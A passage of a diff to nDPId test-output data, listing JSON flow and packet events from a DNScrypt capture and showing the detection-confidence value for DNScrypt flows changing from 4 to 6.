-00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":116,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305192,"flow_last_seen":946739305192,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739305192,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":33369,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":116,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305192,"flow_last_seen":946739305192,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739305192,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":33369,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
00601{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":117,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305192,"flow_last_seen":946739305192,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739305192,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":34885,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01142{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":117,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":1,"flow_last_seen":946739305192,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739305192,"pkt":"REREREREZmZmZmZmCABFAAIcZY1AAL0RdEwKAAABwx5eHIhFIPsCCOQQMswBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAVmZm11YwNuZXQAABAAAQAAAAAAAAAAAAHKAAwBxgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} 
-00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":117,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305192,"flow_last_seen":946739305192,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739305192,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":34885,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":117,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305192,"flow_last_seen":946739305192,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739305192,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":34885,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":118,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739305192} 00420{"packet_event_id":1,"packet_event_name":"packet","packet_id":118,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739305192,"pkt":"REREREREZmZmZmZmCABFAABQZYwAub0RtWAKAAABwx5eHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 
00601{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":119,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305192,"flow_last_seen":946739305192,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739305192,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":44093,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01142{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":119,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":1,"flow_last_seen":946739305192,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739305192,"pkt":"REREREREZmZmZmZmCABFAAIcZY5AAL0RdEsKAAABwx5eHKw9IPsCCOQQMsoBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAVmZm11YwNuZXQAABAAAQAAAAAAAAAAAAHKAAwBxgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} 
-00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":119,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305192,"flow_last_seen":946739305192,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739305192,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":44093,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":119,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305192,"flow_last_seen":946739305192,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739305192,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":44093,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00605{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":120,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305192,"flow_last_seen":946739305192,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739305192,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":53811,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02425{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":120,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":1,"flow_last_seen":946739305192,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739305192,"pkt":"REREREREZmZmZmZmCABFAAXcZY8gAL0RkIoKAAABwx5eHNIzIPsGBOBTMskBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAVmZm11YwNuZXQAABAAAQAAAAAAAAAAAAXGAAwFwgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":120,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305192,"flow_last_seen":946739305192,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739305192,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":53811,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":120,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305192,"flow_last_seen":946739305192,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739305192,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":53811,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":121,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739305192} 
00420{"packet_event_id":1,"packet_event_name":"packet","packet_id":121,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739305192,"pkt":"REREREREZmZmZmZmCABFAABQZY8Aub0RtV0KAAABwx5eHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00704{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":122,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":2,"flow_last_seen":946739305192,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":224,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":224,"pkt_l4_len":190,"thread_ts_msec":946739305192,"pkt":"ZmZmZmZmRERERERECABFAADSF6JAADcRFw2LO8h0CgAAAQG7ktsAvkG1c5CBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdAJ1awAAEAABwAwAEAABAABwgAB9fEROU0MAAgAABjDMcMbz7yA0RLegztcBfq7VeYHKBaMLey+aMNVSTMo4Qj51\/gmF1JL4mny7Kl7CHKqU1ouuslp1lX1chQTTD+JLJw323p3g\/i9lq2cywGbzFxjIXwRFrAIdM6Cq64tY4ksnDfbeneAAAAABX1N7RV9UzMU="} 00605{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":123,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305192,"flow_last_seen":946739305192,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739305192,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":44282,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02425{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":123,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":1,"flow_last_seen":946739305192,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739305192,"pkt":"REREREREZmZmZmZmCABFAAXcZZAgAL0RkIkKAAABwx5eHKz6IPsGBAWJMs0BAAABAAAAAAABATINZG5zY3J5cHQtY2VydAVmZm11YwNuZXQAABAAAQAAAAAAAAAAAAXGAAwFwgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":123,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305192,"flow_last_seen":946739305192,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739305192,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":44282,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":123,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305192,"flow_last_seen":946739305192,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739305192,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":44282,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":124,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739305192} 
00420{"packet_event_id":1,"packet_event_name":"packet","packet_id":124,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739305192,"pkt":"REREREREZmZmZmZmCABFAABQZZAAub0RtVwKAAABwx5eHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00704{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":125,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":2,"flow_last_seen":946739305194,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":224,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":224,"pkt_l4_len":190,"thread_ts_msec":946739305194,"pkt":"ZmZmZmZmRERERERECABFAADSF6NAADcRFwyLO8h0CgAAAQG75zoAvu1Tc5KBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdAJ1awAAEAABwAwAEAABAABwgAB9fEROU0MAAgAABjDMcMbz7yA0RLegztcBfq7VeYHKBaMLey+aMNVSTMo4Qj51\/gmF1JL4mny7Kl7CHKqU1ouuslp1lX1chQTTD+JLJw323p3g\/i9lq2cywGbzFxjIXwRFrAIdM6Cq64tY4ksnDfbeneAAAAABX1N7RV9UzMU="} 
@@ -267,26 +267,26 @@ 00701{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":129,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":2,"flow_last_seen":946739305218,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":222,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":222,"pkt_l4_len":188,"thread_ts_msec":946739305218,"pkt":"ZmZmZmZmRERERERECABFAADQ+LZAADgRZ2\/DHl4cCgAAASD7glkAvOtuMsuAAAABAAEAAAAAATINZG5zY3J5cHQtY2VydAVmZm11YwNuZXQAABAAAcAMABAAAQAADhAAfXxETlNDAAEAANu1cuNn82W5kyvuIYj3yDd11LkL534iAFDK9fBQA07jnu8CUEQwYJt1XxEE91D0YyFd2wLooVHv9yyAcc0SAAB5FL6yNLYbucmv1fHy4RsAcOv\/0XhGDt+qQ0bl\/YNRIXkUvrI0thu5ATQ9Gl8jB9hnnVXw"} 00601{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":130,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305219,"flow_last_seen":946739305219,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739305219,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":32970,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
01142{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":130,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":1,"flow_last_seen":946739305219,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739305219,"pkt":"REREREREZmZmZmZmCABFAAIciBpAAL0RGIYKAAABjgTMb4DKAbsCCB1KAhEBAAABAAAAAAABATINZG5zY3J5cHQtY2VydANuczMCY2EFbHVnZ3MCY28AABAAAQAAAAAAAAAAAAHEAAwBwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA